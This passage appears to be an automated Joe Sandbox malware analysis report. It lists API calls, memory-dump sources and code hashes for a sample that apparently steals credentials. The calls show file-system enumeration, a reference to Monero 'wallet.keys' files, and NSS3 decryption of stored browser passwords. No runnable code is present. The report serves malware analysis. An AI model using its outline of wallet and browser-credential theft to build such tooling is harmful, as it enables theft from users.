                                    • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C6A1695
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6A16B4
                                    • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C6A1770
                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C6A1A3E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: memset$freemallocmemcpy
                                    • String ID: ~qgl$~qgl
                                    • API String ID: 3693777188-195013810
                                    • Opcode ID: c7b5f901d571140b648af2b9b89460cb110a8a344c1705b3c65794b14a6a167c
                                    • Instruction ID: f18f2f36d3fa3e30ca0427fa01c71d3d573fc8a17b2a808b0a468c7be9df8c32
                                    • Opcode Fuzzy Hash: c7b5f901d571140b648af2b9b89460cb110a8a344c1705b3c65794b14a6a167c
                                    • Instruction Fuzzy Hash: 7EB31871E0421ACFCB14CFA8C890ADDB7B2BF49304F2581A9D55AAB745D730AD86CF94
                                    APIs
                                    • EnterCriticalSection.KERNEL32(6C6FE7B8), ref: 6C68FF81
                                    • LeaveCriticalSection.KERNEL32(6C6FE7B8), ref: 6C69022D
                                    • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C690240
                                    • EnterCriticalSection.KERNEL32(6C6FE768), ref: 6C69025B
                                    • LeaveCriticalSection.KERNEL32(6C6FE768), ref: 6C69027B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$AllocVirtual
                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
                                    • API String ID: 618468079-3577267516
                                    • Opcode ID: 3a530e1f38452447404a73a51cf703e4662ae2034518fa3f3ffc7fde5b3a0fdc
                                    • Instruction ID: f70930e177fbe9a53521d31266bc98e79e34879b467efafae7bce057ee677c8c
                                    • Opcode Fuzzy Hash: 3a530e1f38452447404a73a51cf703e4662ae2034518fa3f3ffc7fde5b3a0fdc
                                    • Instruction Fuzzy Hash: 83C2E271A057428FD714CF28C580756BBE2BF8A328F28C66DE4698B7D5C771E801CB89
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00194060
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00194067
                                    • wsprintfA.USER32 ref: 00194086
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0019409D
                                    • StrCmpCA.SHLWAPI(?,001A0F94), ref: 001940CB
                                    • StrCmpCA.SHLWAPI(?,001A0F98), ref: 001940E1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0019416B
                                    • FindClose.KERNEL32(000000FF), ref: 00194180
                                    • lstrcat.KERNEL32(?,013AE500), ref: 001941A5
                                    • lstrcat.KERNEL32(?,013AD638), ref: 001941B8
                                    • lstrlen.KERNEL32(?), ref: 001941C5
                                    • lstrlen.KERNEL32(?), ref: 001941D6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: 8e9264604e02de151958f51885a2ae1f92494e4805b5f507ca8262f5994f47f6
                                    • Instruction ID: 40e9d75b740efdee90be0d6f29b8d5fd54a7a2b653013b5cc37f1e687fad145a
                                    • Opcode Fuzzy Hash: 8e9264604e02de151958f51885a2ae1f92494e4805b5f507ca8262f5994f47f6
                                    • Instruction Fuzzy Hash: FD517572910218AFCB25EBB0DC89FEE737CAF59300F404589B60AD2150EB749B89CF91
                                    APIs
                                    • wsprintfA.USER32 ref: 0018EB7E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0018EB95
                                    • StrCmpCA.SHLWAPI(?,001A14DC), ref: 0018EBEB
                                    • StrCmpCA.SHLWAPI(?,001A14E0), ref: 0018EC01
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0018F0EE
                                    • FindClose.KERNEL32(000000FF), ref: 0018F103
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: edd211cbc5abbc0587a415dd47dff1bc84c5f5abfc6b4be309a237bdb84f2c8f
                                    • Instruction ID: 20d647f241e4b0e9089d9c086bfe07fc69735a897a84db2bb745bf689430856e
                                    • Opcode Fuzzy Hash: edd211cbc5abbc0587a415dd47dff1bc84c5f5abfc6b4be309a237bdb84f2c8f
                                    • Instruction Fuzzy Hash: 98E1CD72911118AADF55FB64DC52EEE733CAF65300F8041A9B50A62092EF706B8DDFD2
                                    APIs
                                    • EnterCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D4F2
                                    • LeaveCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D50B
                                      • Part of subcall function 6C67CFE0: EnterCriticalSection.KERNEL32(6C6FE784), ref: 6C67CFF6
                                      • Part of subcall function 6C67CFE0: LeaveCriticalSection.KERNEL32(6C6FE784), ref: 6C67D026
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D52E
                                    • EnterCriticalSection.KERNEL32(6C6FE7DC), ref: 6C69D690
                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C69D6A6
                                    • LeaveCriticalSection.KERNEL32(6C6FE7DC), ref: 6C69D712
                                    • LeaveCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D751
                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C69D7EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                    • String ID: : (malloc) Error initializing arena$<jemalloc>
                                    • API String ID: 2690322072-3894294050
                                    • Opcode ID: 181c8b0630294c635742edd4d71db6058ffad56d98f59d25de81f04213c28c91
                                    • Instruction ID: c9290e36a74f84c8237f0f851cbb09f29d182475257fbb5c39ab991d19909437
                                    • Opcode Fuzzy Hash: 181c8b0630294c635742edd4d71db6058ffad56d98f59d25de81f04213c28c91
                                    • Instruction Fuzzy Hash: 9691C771A047428FD714CF29C59076ABBE2FB85318F14893EE56AC7B81D730E845CB8A
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,001A0C19), ref: 0018DC9E
                                    • StrCmpCA.SHLWAPI(?,001A146C), ref: 0018DCEE
                                    • StrCmpCA.SHLWAPI(?,001A1470), ref: 0018DD04
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0018E220
                                    • FindClose.KERNEL32(000000FF), ref: 0018E232
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: 37421294c9a6c26c5a6d9ebee754825a45c3f1a93aad1a62b109b0aff0b284b5
                                    • Instruction ID: 034431d24120ee1a362a4f4741ad6b76462e7d15fb60141d8fef10e7c9aba989
                                    • Opcode Fuzzy Hash: 37421294c9a6c26c5a6d9ebee754825a45c3f1a93aad1a62b109b0aff0b284b5
                                    • Instruction Fuzzy Hash: 74F16C71814118AACF19FB64DC95AEE7338BF65300F8041E9B51A620A1EF716B8DDFD2
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0018C6B1
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0018C6BC
                                    • PK11_GetInternalKeySlot.NSS3 ref: 0018C6CA
                                    • PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0018C6E5
                                    • PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0018C72B
                                    • lstrcat.KERNEL32(?,001A0B2E), ref: 0018C783
                                    • lstrcat.KERNEL32(?,001A0B2F), ref: 0018C797
                                    • PK11_FreeSlot.NSS3(?), ref: 0018C7A1
                                    • lstrcat.KERNEL32(?,001A0B33), ref: 0018C7B8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
                                    • String ID:
                                    • API String ID: 3356303513-0
                                    • Opcode ID: f14cd97ce3b0837a921768aa13bde4279655f8c4dba740b3575d73c6d58c7b9d
                                    • Instruction ID: c0a839de22aa0950fad32fadb47375e4167ff07df4ed4768fb4cba392179b3dc
                                    • Opcode Fuzzy Hash: f14cd97ce3b0837a921768aa13bde4279655f8c4dba740b3575d73c6d58c7b9d
                                    • Instruction Fuzzy Hash: 60414F7990421ADFDB10DFA0DD89FFEB7B8BB49304F1041A8E609A7280D7745A84CFA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: NBwv$Q;$[xm$[xm$oE]~$r~w$w6]u$B)5$m
                                    • API String ID: 0-767094649
                                    • Opcode ID: a018f064cbad8268da590060aea9f398b6d7231ce106888a3b57da8e7b499ca3
                                    • Instruction ID: 6b3bd4b00cbd9075e3d2e1aa2219cdfdaa0d8bd25058a9a8d7f36e906130c363
                                    • Opcode Fuzzy Hash: a018f064cbad8268da590060aea9f398b6d7231ce106888a3b57da8e7b499ca3
                                    • Instruction Fuzzy Hash: 0CB229F3A0C2009FE708AE2DEC8567ABBE5EF94320F16493DEAC5C7344E97558018697
                                    APIs
                                    • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C6C2C31
                                    • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C6C2C61
                                      • Part of subcall function 6C674DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C674E5A
                                      • Part of subcall function 6C674DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C674E97
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6C2C82
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6C2E2D
                                      • Part of subcall function 6C6881B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C6881DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                    • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                    • API String ID: 801438305-4149320968
                                    • Opcode ID: ec4da0afed784223a6327250c1d654ded6e3d743f50d6bd9e1b7d056855011a0
                                    • Instruction ID: 323de6c47007a62474a713327a51e6afa3120c5b4383c78c46a2b93eaefca42a
                                    • Opcode Fuzzy Hash: ec4da0afed784223a6327250c1d654ded6e3d743f50d6bd9e1b7d056855011a0
                                    • Instruction Fuzzy Hash: 7F91BE706087418FC724CF25C48469EB7E1EFCA358F10492DE99A8B750DB30D949CB5B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
